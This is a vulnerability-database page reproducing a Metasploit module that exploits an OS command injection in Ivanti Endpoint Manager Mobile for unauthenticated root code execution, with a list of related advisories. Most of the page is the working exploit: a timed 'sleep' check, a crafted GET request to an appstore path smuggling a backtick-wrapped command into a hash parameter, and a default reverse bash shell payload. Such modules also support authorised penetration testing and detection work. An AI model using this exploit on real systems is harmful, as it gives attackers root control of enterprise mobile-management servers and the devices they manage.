Vulners
Lucene search
Ivanti Endpoint Manager Mobile (EPMM) unauthenticated RCE
ποΈΒ 10 Feb 2026Β 18:59:24Reported byΒ watchTowr, sfewer-r7TypeΒ 
Β metasploitπΒ www.rapid7.comπΒ 262Β Views
| Reporter | Title | Published | Views | Family All 47 |
|---|---|---|---|---|
 | Exploit for Code Injection in Ivanti Endpoint_Manager_Mobile | 19 Feb 202621:29 | β | githubexploit |
| Exploit for Code Injection in Ivanti Endpoint_Manager_Mobile | 7 Feb 202611:28 | β | githubexploit |
 | CVE-2026-1731 | 6 Feb 202621:49 | β | attackerkb |
| CVE-2026-1281 | 29 Jan 202621:31 | β | attackerkb |
| CVE-2026-1340 | 29 Jan 202621:33 | β | attackerkb |
 | CVE-2026-1281 | 29 Jan 202618:15 | β | circl |
| CVE-2026-1340 | 29 Jan 202619:59 | β | circl |
 | Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability | 29 Jan 202600:00 | β | cisa_kev |
| Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability | 8 Apr 202600:00 | β | cisa_kev |
 | CISA Adds One Known Exploited Vulnerability to Catalog | 29 Jan 202612:00 | β | cisa |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/stopwatch'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Ivanti Endpoint Manager Mobile (EPMM) unauthenticated RCE',
'Description' => %q{
This module exploits a OS command injection issue in Ivanti Endpoint Manager Mobile (EPMM), formerly known
as MobileIron. A remote attacker can achieve unauthenticated RCE with root privileges on an affected device.
},
'License' => MSF_LICENSE,
'Author' => [
'watchTowr', # Original analysis and PoC
'sfewer-r7' # MSF module
],
'References' => [
['CVE', '2026-1281'],
['CVE', '2026-1340'],
# Vendor advisory
['URL', 'https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US'],
# Vendor guidance
['URL', 'https://forums.ivanti.com/s/article/Analysis-Guidance-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US'],
# Technical analysis & PoC
['URL', 'https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/']
],
'DisclosureDate' => '2026-01-29',
'Privileged' => true, # Executes as root.
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'Targets' => [
[
# Successfully tested with the following payloads against MobileIron 11.2:
# cmd/unix/reverse_bash
# cmd/unix/reverse_netcat
# NOTE: The Linux fetch payloads did not work on MobileIron 11.2, YMMV on later product versions.
'Default', {
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash',
'FETCH_WRITABLE_DIR' => '/tmp'
}
}
],
],
'Payload' => {
'BadChars' => '`'
},
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([OptString.new('TARGETURI', [true, 'Base path', '/'])])
end
def check
res_ver = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mifs', 'user', 'login.jsp')
)
return CheckCode::Unknown('Connection to /mifs/user/login.jsp failed') unless res_ver
return CheckCode::Unknown("Unexpected /mifs/user/login.jsp response code #{res_ver.code}") unless res_ver.code == 200
ver_match = res_ver.body.match(/ui\.login\.css\?([\d.]+)"/)
return CheckCode::Unknown('Failed to version match on ui.login.css') unless ver_match
product_name = 'EPMM'
# Ivanti acquired MobileIron and rebranded it to Endpoint Manager Mobile (EPMM) around version 11.4.
if Rex::Version.new(ver_match[1]) < Rex::Version.new('11.4.0.0')
product_name = 'MobileIron'
end
version_string = "Detected Ivanti #{product_name} version #{ver_match[1]}"
sleep_time = rand(4..8)
# We use proof-of-execution in the form of a delay to confirm if a target is vulnerable.
res, elapsed_time = Rex::Stopwatch.elapsed_time do
execute_cmd("sleep #{sleep_time}")
end
return CheckCode::Unknown("#{version_string}. Connection failed") unless res
if elapsed_time < sleep_time
return CheckCode::Safe(version_string)
end
CheckCode::Vulnerable(version_string)
end
def exploit
execute_cmd(payload.encoded)
end
def execute_cmd(cmd)
elements = {
'kid' => rand(32),
'st' => 'theValue'.ljust(10), # A length check in EPMM requires this value to be 10 characters long.
'et' => (Time.now + (60 * 60 * rand(24))).to_i,
'h' => "gPath[`#{cmd}`]"
}
hash = 'sha256:'
hash += elements.map { |k, v| "#{k}=#{Rex::Text.uri_encode(v.to_s, 'hex-noslashes')}" }.join(',')
vprint_status("hash: #{hash}")
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(
target_uri.path,
'mifs',
'c',
'appstore',
'fob',
'3',
rand(1024).to_s,
hash,
"#{SecureRandom.uuid}.ipa"
)
)
end
end
Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jun 2026 19:02Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8
EPSS0.81586
SSVC